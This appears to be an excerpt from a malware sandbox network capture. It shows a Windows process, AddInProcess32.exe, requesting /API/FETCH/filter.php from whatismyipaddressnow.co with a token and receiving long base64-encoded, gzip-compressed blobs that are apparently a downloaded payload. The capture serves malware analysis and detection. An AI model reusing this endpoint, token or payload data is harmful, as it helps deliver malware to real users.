          2024-06-14 13:15:07 UTC1369INData Raw: f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5
          Data Ascii: b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
          2024-06-14 13:15:07 UTC1369INData Raw: 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03
          Data Ascii: MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
          2024-06-14 13:15:07 UTC1369INData Raw: 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06
          Data Ascii: nq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`C
          2024-06-14 13:15:07 UTC1369INData Raw: 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3
          Data Ascii: d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|k


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.849710188.114.96.34438168C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:16 UTC125OUTGET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1
          Host: whatismyipaddressnow.co
          Connection: Keep-Alive
          2024-06-14 13:15:17 UTC617INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:17 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWsdZ6fbK8rDYaT3Jwyz6u9%2BfQJJlDsVkbyi%2Fg%2FsuWR0mQRE7ZeiivCYVHMT7IO%2B%2BevMrTfWubD2AVxT%2FGMde9aAabOpL0aZKM6iLuJSOaHd8BqtlB7HpGZR8rLOyZ5m8WdVpOTfLkbVJw%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a9696dfa62d33-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:17 UTC752INData Raw: 34 39 37 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4c 68 62 73 48 41 45 5a 42 65 6b 74 42 37 6b 39 35 43 72 36 48 44 41 61 47 48 68 4e 42 52 41 65 6b 67 53 6b 63 51 6b 43 35 46 46 42 57 6c 57 42 41 70 69 71 4b 69 4b 46 5a 51 73 57 42 42 32 6e 2f 65 33 4f 33 75 33 4d 37 75 33 65 37 63 2f 63 4c 66 6a 33 78 7a 4e 37 66 7a 39 73 31 37 62 2f 71 38 4e 32 31 37 4c 75 45 4d 48 4d 63 5a 30 62 2b 48 44 7a 6e 75 4b 4f 66 36 72 79 48 6e 2b 37 38 69 39 43 2f 61 64 69 79 61 65 7a 6e 38 41 2f 35 6f 30 42 4d 66 38 46 32 47 44 63 2b 7a 6a 78 33 76 48 44 70 2b 77 47 6a 37 6f 41 46 6a 78 6a 67 6e 32 41 66 6d 32 73 64 50 48 47 4d 66 50 73 62 65 74 48 31 6e 2b 32 6a 6e 34 4e 78 4b 55 56 48 6d 78 39 77 30 4f
          Data Ascii: 497eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9LhbsHAEZBektB7k95Cr6HDAaGHhNBRAekgSkcQkC5FFBWlWBApiqKiKFZQsWBB2n/e3O3u3M7u3e7c/cLfj3xzN7fz9s17b/q8N217LuEMHMcZ0b+HDznuKOf6ryHn+78i9C/adiyaezn8A/5o0BMf8F2GDc+zjx3vHDp+wGj7oAFjxjgn2Afm2sdPHGMfPsbetH1n+2jn4NxKUVHmx9w0O
          2024-06-14 13:15:17 UTC1369INData Raw: 63 6a 48 59 7a 31 5a 4e 54 39 43 39 39 79 55 36 33 48 71 48 79 56 38 6b 6f 59 45 61 4f 52 77 47 69 30 34 51 49 71 56 75 6b 56 5a 31 74 49 6a 38 56 37 76 6f 55 67 37 31 6e 67 55 73 48 35 4d 55 43 6a 64 4c 43 68 49 4d 5a 56 36 76 78 59 49 53 48 57 6e 57 41 52 45 69 7a 75 68 44 67 68 41 58 2f 6f 46 71 38 6f 61 49 48 2f 30 75 47 62 75 31 44 38 72 2b 4c 76 76 66 5a 48 58 55 49 36 53 35 62 2b 47 6b 55 39 31 63 35 67 44 4d 35 50 51 4f 39 77 4e 41 31 42 30 69 30 4a 61 59 73 4e 77 66 6d 4a 4b 47 6c 38 6d 62 4c 63 57 4b 4d 6a 43 36 55 46 35 79 64 35 50 69 4f 2b 65 31 66 2f 6e 39 4d 70 71 70 50 34 79 72 6e 66 74 6c 61 56 56 62 79 71 52 76 67 4f 75 39 74 50 56 4d 73 33 69 56 39 2f 71 54 64 52 55 45 39 70 7a 43 4c 49 38 59 75 66 64 4e 53 53 48 69 77 73 41 30 4a 45 35
          Data Ascii: cjHYz1ZNT9C99yU63HqHyV8koYEaORwGi04QIqVukVZ1tIj8V7voUg71ngUsH5MUCjdLChIMZV6vxYISHWnWAREizuhDghAX/oFq8oaIH/0uGbu1D8r+LvvfZHXUI6S5b+GkU91c5gDM5PQO9wNA1B0i0JaYsNwfmJKGl8mbLcWKMjC6UF5yd5PiO+e1f/n9MpqpP4yrnftlaVVbyqRvgOu9tPVMs3iV9/qTdRUE9pzCLI8YufdNSSHiwsA0JE5
          2024-06-14 13:15:17 UTC1369INData Raw: 76 65 74 2f 64 4b 35 30 56 65 71 57 7a 37 6f 51 50 68 49 51 50 33 41 6e 6e 68 49 52 7a 37 6f 51 50 68 59 51 50 33 51 6e 6e 68 59 54 7a 37 76 48 32 6e 58 67 30 75 45 59 2f 58 42 42 2b 75 4f 42 2b 38 71 4b 51 63 4e 47 64 63 45 6c 49 77 42 38 4f 42 78 73 63 71 36 48 67 6e 4c 33 2f 44 53 54 2f 6e 49 51 65 7a 6d 6e 77 66 63 4a 4c 61 42 52 45 4a 4b 34 4a 77 6d 4e 65 52 30 38 6f 5a 33 61 77 34 31 6e 30 48 52 48 35 43 49 68 55 43 38 36 48 76 38 36 31 51 62 67 62 63 48 31 35 6a 76 7a 79 50 50 6c 6c 46 55 64 38 57 51 65 2f 31 48 4a 39 4d 54 6a 58 6b 38 39 74 77 43 70 77 2f 32 51 4d 63 61 35 32 76 64 72 39 33 62 6e 52 49 2b 63 6d 32 63 4f 62 34 58 74 7a 39 2f 63 45 77 2b 4c 68 72 70 54 78 51 74 31 6f 74 76 6b 69 55 5a 73 4c 4c 33 76 55 75 4b 45 62 46 34 77 6b 44 4b
          Data Ascii: vet/dK50VeqWz7oQPhIQP3AnnhIRz7oQPhYQP3QnnhYTz7vH2nXg0uEY/XBB+uOB+8qKQcNGdcElIwB8OBxscq6HgnL3/DST/nIQezmnwfcJLaBREJK4JwmNeR08oZ3aw41n0HRH5CIhUC86Hv861QbgbcH15jvzyPPllFUd8WQe/1HJ9MTjXk89twCpw/2QMca52vdr93bnRI+cm2cOb4Xtz9/cEw+LhrpTxQt1otvkiUZsLL3vUuKEbF4wkDK
          2024-06-14 13:15:17 UTC1369INData Raw: 75 66 41 61 6e 68 4f 70 77 52 79 46 43 2b 49 6d 45 51 59 50 70 58 47 75 4e 54 36 54 6f 78 53 41 44 63 43 75 51 41 4c 39 59 41 34 4e 68 2b 37 4e 37 4d 34 65 44 67 2f 77 41 4b 55 42 79 67 41 38 42 70 43 75 77 6f 45 44 44 59 68 4d 4a 41 4e 6d 65 4b 59 73 51 44 6b 41 42 30 42 35 67 41 78 4e 44 45 54 41 41 78 55 41 4b 67 49 38 44 6c 41 4a 6f 4c 4a 57 42 69 4c 68 6d 53 6f 41 56 51 47 71 41 56 51 48 71 4b 47 4a 67 53 68 34 6f 43 5a 41 4c 59 44 61 41 4a 6b 41 57 56 6f 5a 69 49 5a 6e 73 67 48 71 41 4e 51 46 71 41 64 51 58 78 4d 44 4d 66 42 41 41 34 43 47 41 49 30 41 47 67 4d 30 30 63 70 41 4c 44 7a 54 46 4b 41 5a 51 48 4f 41 46 67 41 74 56 52 69 77 47 69 31 47 30 4c 6f 35 61 79 48 55 45 47 4e 79 59 6e 4a 65 61 55 67 50 38 65 44 4d 41 6a 6c 62 41 62 51 47 61 41 50
          Data Ascii: ufAanhOpwRyFC+ImEQYPpXGuNT6ToxSADcCuQAL9YA4Nh+7N7M4eDg/wAKUBygA8BpCuwoEDDYhMJANmeKYsQDkAB0B5gAxNDETAAxUAKgI8DlAJoLJWBiLhmSoAVQGqAVQHqKGJgSh4oCZALYDaAJkAWVoZiIZnsgHqANQFqAdQXxMDMfBAA4CGAI0AGgM00cpALDzTFKAZQHOAFgAtVRiwGi1G0Lo5ayHUEGNyYnJeaUgP8eDMAjlbAbQGaAP
          2024-06-14 13:15:17 UTC1369INData Raw: 71 57 46 46 46 4b 49 38 4a 30 6f 47 48 7a 31 48 48 2f 30 67 33 4a 46 75 73 76 31 50 59 65 50 2f 6c 6a 6f 70 59 34 45 61 31 7a 6d 53 56 79 57 4f 4a 47 4a 67 53 34 6d 34 6c 43 61 76 48 35 44 6d 6d 63 4a 49 63 57 7a 68 4a 44 69 55 55 4a 49 38 43 77 4e 70 4d 68 30 42 30 6d 65 30 6f 51 55 73 73 6a 77 6e 53 67 79 5a 73 2f 73 55 65 62 61 55 4f 5a 59 64 35 6c 66 64 72 63 74 35 50 70 43 6a 39 32 44 2b 35 42 36 46 4e 73 58 75 68 6d 51 74 79 39 30 63 30 4b 31 4f 4b 49 41 42 30 6e 74 43 39 31 77 61 57 31 66 78 44 70 33 35 2b 6b 72 78 46 4b 53 63 70 33 54 56 42 47 6f 4b 69 59 79 50 4e 68 62 4e 30 6a 58 56 62 70 71 2b 74 45 76 69 6e 33 41 6c 44 65 37 74 53 4b 55 51 2b 6d 49 31 6f 42 63 52 37 51 57 78 52 4c 6d 53 69 71 68 39 4d 61 75 49 7a 68 6e 45 43 36 4e 79 59 52 70
          Data Ascii: qWFFFKI8J0oGHz1HH/0g3JFusv1PYeP/ljopY4Ea1zmSVyWOJGJgS4m4lCavH5DmmcJIcWzhJDiUUJI8CwNpMh0B0me0oQUssjwnSgyZs/sUebaUOZYd5lfdrct5PpCj92D+5B6FNsXuhmQty90c0K1OKIAB0ntC91waW1fxDp35+krxFKScp3TVBGoKiYyPNhbN0jXVbpq+tEvin3AlDe7tSKUQ+mI1oBcR7QWxRLmSiqh9MauIzhnEC6NyYRp
          2024-06-14 13:15:17 UTC1369INData Raw: 6e 66 73 37 37 33 54 66 49 51 70 31 5a 5a 78 77 5a 51 62 7a 30 44 32 63 5a 4d 42 4a 30 39 6a 58 58 32 4e 4b 66 55 46 6a 6a 43 61 78 44 2b 50 45 7a 76 55 46 73 48 45 65 31 75 30 2f 49 2f 36 4d 4f 64 32 75 6e 33 41 50 72 62 4d 66 33 74 4a 48 30 59 49 49 62 53 37 61 53 30 46 79 55 61 78 6c 42 70 45 34 6e 65 65 35 4a 76 49 74 48 62 54 4e 54 75 6c 4a 5a 4e 4c 75 31 37 55 61 49 75 46 71 7a 63 54 70 78 72 5a 39 4b 46 32 76 71 30 33 4d 36 2f 37 39 65 4c 59 56 33 45 56 70 63 61 39 35 2f 61 46 70 73 67 45 65 4b 35 64 30 32 64 39 64 50 6c 37 4c 44 6a 68 69 45 48 49 7a 32 57 62 76 68 35 44 36 4a 52 59 61 6c 58 76 46 77 57 79 6d 64 77 4e 4e 4f 62 4c 74 42 62 4b 4a 4e 74 56 4c 6c 4f 78 49 46 33 52 41 39 33 74 69 61 77 49 74 69 52 77 68 37 45 47 53 6c 75 6f 69 41 38 4f
          Data Ascii: nfs773TfIQp1ZZxwZQbz0D2cZMBJ09jXX2NKfUFjjCaxD+PEzvUFsHEe1u0/I/6MOd2un3APrbMf3tJH0YIIbS7aS0FyUaxlBpE4nee5JvItHbTNTulJZNLu17UaIuFqzcTpxrZ9KF2vq03M6/79eLYV3EVpca95/aFpsgEeK5d02d9dPl7LDjhiEHIz2Wbvh5D6JRYalXvFwWymdwNNObLtBbKJNtVLlOxIF3RA93tiawItiRwh7EGSluoiA8O
          2024-06-14 13:15:17 UTC1369INData Raw: 36 47 49 51 30 44 77 59 68 67 5a 51 4f 66 43 63 59 68 71 2b 65 33 64 78 73 34 44 63 73 51 33 45 39 58 76 66 36 6c 56 70 66 49 36 36 50 66 62 37 39 4e 4c 46 5a 71 70 76 2b 59 76 51 52 51 77 35 47 61 6f 2f 54 6e 7a 4d 4d 32 34 44 32 4e 6b 78 37 47 36 65 30 4c 72 50 36 36 7a 59 7a 6c 48 57 6f 64 52 30 6c 6e 6c 70 44 76 78 33 61 69 6f 36 4e 6f 6e 39 76 57 71 53 58 63 62 74 42 56 33 5a 36 2b 64 54 59 49 4b 7a 63 77 39 5a 45 48 56 31 78 62 79 7a 68 37 71 42 64 74 75 41 51 5a 39 2b 50 5a 59 75 52 32 67 66 37 37 71 6b 71 64 75 49 39 4d 32 76 31 53 39 66 2f 48 6c 74 48 53 68 36 4c 50 71 67 66 53 52 44 53 53 61 39 32 6f 50 61 70 6d 6b 44 35 6a 2b 50 79 48 2b 63 55 39 6e 67 59 7a 32 49 4d 6f 4f 72 58 6c 45 73 4e 78 6a 44 72 58 2f 31 4d 67 6b 44 66 76 33 56 45 7a 74
          Data Ascii: 6GIQ0DwYhgZQOfCcYhq+e3dxs4DcsQ3E9Xvf6lVpfI66Pfb79NLFZqpv+YvQRQw5Gao/TnzMM24D2Nkx7G6e0LrP66zYzlHWodR0lnlpDvx3aio6Non9vWqSXcbtBV3Z6+dTYIKzcw9ZEHV1xbyzh7qBdtuAQZ9+PZYuR2gf77qkqduI9M2v1S9f/HltHSh6LPqgfSRDSSa92oPapmkD5j+PyH+cU9ngYz2IMoOrXlEsNxjDrX/1MgkDfv3VEzt
          2024-06-14 13:15:17 UTC1369INData Raw: 30 41 2b 67 50 38 41 41 4f 72 73 72 52 37 63 53 6e 43 74 57 6e 4c 4d 4e 41 45 6d 73 4e 75 51 5a 43 44 41 49 59 44 42 41 4c 73 41 51 4e 57 4b 74 31 59 6c 6c 51 70 36 68 41 4d 4d 41 68 67 4f 4d 41 42 69 70 52 69 78 54 6e 56 67 57 35 42 6b 46 4d 42 70 67 44 49 41 54 59 4b 77 6d 4b 57 58 44 55 2b 4d 41 78 67 50 6b 41 55 77 41 6d 4b 6a 47 53 78 64 31 58 75 70 41 6e 6b 6b 41 6b 77 47 6d 41 45 77 46 6d 4b 5a 47 72 4b 55 36 73 62 71 51 4a 78 39 67 4f 6b 41 42 51 43 48 41 44 44 56 69 32 65 72 45 36 6b 47 65 49 6f 43 5a 41 4c 4d 41 5a 67 50 4d 55 53 4e 57 53 35 31 59 66 63 67 7a 46 32 41 65 77 48 79 41 42 51 42 50 71 68 47 72 71 30 36 73 41 65 52 35 43 75 42 70 67 49 55 41 69 77 41 57 71 78 48 72 70 45 36 73 49 65 52 35 42 6d 41 4a 77 46 4b 41 5a 51 44 4c 31 59 67
          Data Ascii: 0A+gP8AAOrsrR7cSnCtWnLMNAEmsNuQZCDAIYDBALsAQNWKt1YllQp6hAMMAhgOMABipRixTnVgW5BkFMBpgDIATYKwmKWXDU+MAxgPkAUwAmKjGSxd1XupAnkkAkwGmAEwFmKZGrKU6sbqQJx9gOkABQCHADDVi2erE6kGeIoCZALMAZgPMUSNWS51YfcgzF2AewHyABQBPqhGrq06sAeR5CuBpgIUAiwAWqxHrpE6sIeR5BmAJwFKAZQDL1Yg
          2024-06-14 13:15:17 UTC1369INData Raw: 47 42 79 64 67 45 4c 74 69 57 69 78 46 53 43 2b 44 71 61 67 54 54 30 53 41 72 78 79 49 70 67 36 70 46 55 49 42 31 44 76 4e 39 73 6f 4e 38 66 69 78 34 71 52 54 78 7a 56 61 47 73 34 55 41 6f 6b 6e 67 6f 55 61 45 67 55 65 67 68 38 63 52 6e 56 35 52 69 54 6b 49 70 4a 51 6b 57 66 36 4e 4a 6c 77 4c 4b 4a 51 6a 4b 45 78 56 59 54 49 43 48 6f 74 46 44 63 47 37 66 56 49 69 4d 77 5a 69 65 44 56 48 66 79 78 62 43 70 59 77 50 54 49 75 46 73 71 63 58 77 59 39 45 31 68 6a 49 61 69 62 6f 6f 77 77 55 2f 51 68 34 79 45 6f 38 6c 4b 46 51 76 48 68 34 4b 46 35 6b 77 6b 51 78 73 55 52 69 77 75 54 4a 52 41 6e 49 47 6b 58 51 62 78 68 4b 30 34 2b 47 68 2b 4a 45 2b 69 45 55 2f 57 63 6b 2b 69 47 65 39 4b 30 6f 4b 33 51 2f 6c 58 46 4f 41 35 56 7a 6b 5a 54 54 34 4a 45 7a 47 64 34 5a
          Data Ascii: GBydgELtiWixFSC+DqagTT0SArxyIpg6pFUIB1DvN9soN8fix4qRTxzVaGs4UAokngoUaEgUegh8cRnV5RiTkIpJQkWf6NJlwLKJQjKExVYTICHotFDcG7fVIiMwZieDVHfyxbCpYwPTIuFsqcXwY9E1hjIaiboowwU/Qh4yEo8lKFQvHh4KF5kwkQxsURiwuTJRAnIGkXQbxhK04+Gh+JE+iEU/Wck+iGe9K0oK3Q/lXFOA5VzkZTT4JEzGd4Z
          2024-06-14 13:15:17 UTC1369INData Raw: 32 47 45 59 46 2f 6d 58 7a 68 31 47 4c 49 69 33 35 48 31 31 75 46 4e 35 58 65 77 62 39 56 35 68 51 52 57 6b 42 2f 66 44 43 52 37 73 45 62 5a 59 6d 42 4f 76 39 4d 68 59 75 31 47 65 68 32 43 35 44 76 58 6b 75 4b 76 78 33 54 31 39 63 67 2b 4d 76 38 2b 4c 76 68 44 50 77 4e 6f 76 79 74 53 6d 31 2f 67 62 79 73 75 2f 50 75 35 5a 33 30 30 31 57 33 44 5a 48 2f 4c 36 36 4d 49 77 62 66 66 4a 64 76 77 6a 4d 59 2b 42 66 6a 4c 77 62 41 70 79 32 58 34 76 46 79 61 47 76 79 37 75 67 32 74 64 70 55 5a 65 41 78 57 38 36 6a 48 2f 48 47 32 38 6e 72 47 44 6b 66 71 4a 37 61 73 53 47 4c 72 74 37 6b 6c 4f 2b 42 45 48 32 51 44 33 2f 65 78 67 2b 66 37 50 4b 55 48 33 72 6c 2f 7a 6f 51 64 77 69 79 79 43 47 42 34 6e 46 43 79 4f 54 52 37 44 79 32 6f 2b 72 42 2b 30 31 4f 45 63 4c 6b 71
          Data Ascii: 2GEYF/mXzh1GLIi35H11uFN5Xewb9V5hQRWkB/fDCR7sEbZYmBOv9MhYu1Geh2C5DvXkuKvx3T19cg+Mv8+LvhDPwNovytSm1/gbysu/Pu5Z3001W3DZH/L66MIwbffJdvwjMY+BfjLwbApy2X4vFyaGvy7ug2tdpUZeAxW86jH/HG28nrGDkfqJ7asSGLrt7klO+BEH2QD3/exg+f7PKUH3rl/zoQdwiyyCGB4nFCyOTR7Dy2o+rB+01OEcLkq


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.849713188.114.96.34438168C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:18 UTC101OUTGET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1
          Host: whatismyipaddressnow.co
          2024-06-14 13:15:19 UTC613INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQcRiQDC3k0ohSuZDcQ%2FmP5tLFTHYDByvKLbscpDdm%2FD6JTGLy8kyCtdv12Vxr5aAj03GyrWPythZxNwldRhNTCY71BP7Oz0nWRS%2F%2BDZnIoJGLtmZOl13RFFkk820tuxirvM0LdWgoxffQ%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a96a24e4d6c40-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:19 UTC756INData Raw: 34 39 37 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4c 68 62 73 48 41 45 5a 42 65 6b 74 42 37 6b 39 35 43 72 36 48 44 41 61 47 48 68 4e 42 52 41 65 6b 67 53 6b 63 51 6b 43 35 46 46 42 57 6c 57 42 41 70 69 71 4b 69 4b 46 5a 51 73 57 42 42 32 6e 2f 65 33 4f 33 75 33 4d 37 75 33 65 37 63 2f 63 4c 66 6a 33 78 7a 4e 37 66 7a 39 73 31 37 62 2f 71 38 4e 32 31 37 4c 75 45 4d 48 4d 63 5a 30 62 2b 48 44 7a 6e 75 4b 4f 66 36 72 79 48 6e 2b 37 38 69 39 43 2f 61 64 69 79 61 65 7a 6e 38 41 2f 35 6f 30 42 4d 66 38 46 32 47 44 63 2b 7a 6a 78 33 76 48 44 70 2b 77 47 6a 37 6f 41 46 6a 78 6a 67 6e 32 41 66 6d 32 73 64 50 48 47 4d 66 50 73 62 65 74 48 31 6e 2b 32 6a 6e 34 4e 78 4b 55 56 48 6d 78 39 77 30 4f
          Data Ascii: 497eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9LhbsHAEZBektB7k95Cr6HDAaGHhNBRAekgSkcQkC5FFBWlWBApiqKiKFZQsWBB2n/e3O3u3M7u3e7c/cLfj3xzN7fz9s17b/q8N217LuEMHMcZ0b+HDznuKOf6ryHn+78i9C/adiyaezn8A/5o0BMf8F2GDc+zjx3vHDp+wGj7oAFjxjgn2Afm2sdPHGMfPsbetH1n+2jn4NxKUVHmx9w0O
          2024-06-14 13:15:19 UTC1369INData Raw: 7a 31 5a 4e 54 39 43 39 39 79 55 36 33 48 71 48 79 56 38 6b 6f 59 45 61 4f 52 77 47 69 30 34 51 49 71 56 75 6b 56 5a 31 74 49 6a 38 56 37 76 6f 55 67 37 31 6e 67 55 73 48 35 4d 55 43 6a 64 4c 43 68 49 4d 5a 56 36 76 78 59 49 53 48 57 6e 57 41 52 45 69 7a 75 68 44 67 68 41 58 2f 6f 46 71 38 6f 61 49 48 2f 30 75 47 62 75 31 44 38 72 2b 4c 76 76 66 5a 48 58 55 49 36 53 35 62 2b 47 6b 55 39 31 63 35 67 44 4d 35 50 51 4f 39 77 4e 41 31 42 30 69 30 4a 61 59 73 4e 77 66 6d 4a 4b 47 6c 38 6d 62 4c 63 57 4b 4d 6a 43 36 55 46 35 79 64 35 50 69 4f 2b 65 31 66 2f 6e 39 4d 70 71 70 50 34 79 72 6e 66 74 6c 61 56 56 62 79 71 52 76 67 4f 75 39 74 50 56 4d 73 33 69 56 39 2f 71 54 64 52 55 45 39 70 7a 43 4c 49 38 59 75 66 64 4e 53 53 48 69 77 73 41 30 4a 45 35 74 4b 6f 51
          Data Ascii: z1ZNT9C99yU63HqHyV8koYEaORwGi04QIqVukVZ1tIj8V7voUg71ngUsH5MUCjdLChIMZV6vxYISHWnWAREizuhDghAX/oFq8oaIH/0uGbu1D8r+LvvfZHXUI6S5b+GkU91c5gDM5PQO9wNA1B0i0JaYsNwfmJKGl8mbLcWKMjC6UF5yd5PiO+e1f/n9MpqpP4yrnftlaVVbyqRvgOu9tPVMs3iV9/qTdRUE9pzCLI8YufdNSSHiwsA0JE5tKoQ
          2024-06-14 13:15:19 UTC1369INData Raw: 64 4b 35 30 56 65 71 57 7a 37 6f 51 50 68 49 51 50 33 41 6e 6e 68 49 52 7a 37 6f 51 50 68 59 51 50 33 51 6e 6e 68 59 54 7a 37 76 48 32 6e 58 67 30 75 45 59 2f 58 42 42 2b 75 4f 42 2b 38 71 4b 51 63 4e 47 64 63 45 6c 49 77 42 38 4f 42 78 73 63 71 36 48 67 6e 4c 33 2f 44 53 54 2f 6e 49 51 65 7a 6d 6e 77 66 63 4a 4c 61 42 52 45 4a 4b 34 4a 77 6d 4e 65 52 30 38 6f 5a 33 61 77 34 31 6e 30 48 52 48 35 43 49 68 55 43 38 36 48 76 38 36 31 51 62 67 62 63 48 31 35 6a 76 7a 79 50 50 6c 6c 46 55 64 38 57 51 65 2f 31 48 4a 39 4d 54 6a 58 6b 38 39 74 77 43 70 77 2f 32 51 4d 63 61 35 32 76 64 72 39 33 62 6e 52 49 2b 63 6d 32 63 4f 62 34 58 74 7a 39 2f 63 45 77 2b 4c 68 72 70 54 78 51 74 31 6f 74 76 6b 69 55 5a 73 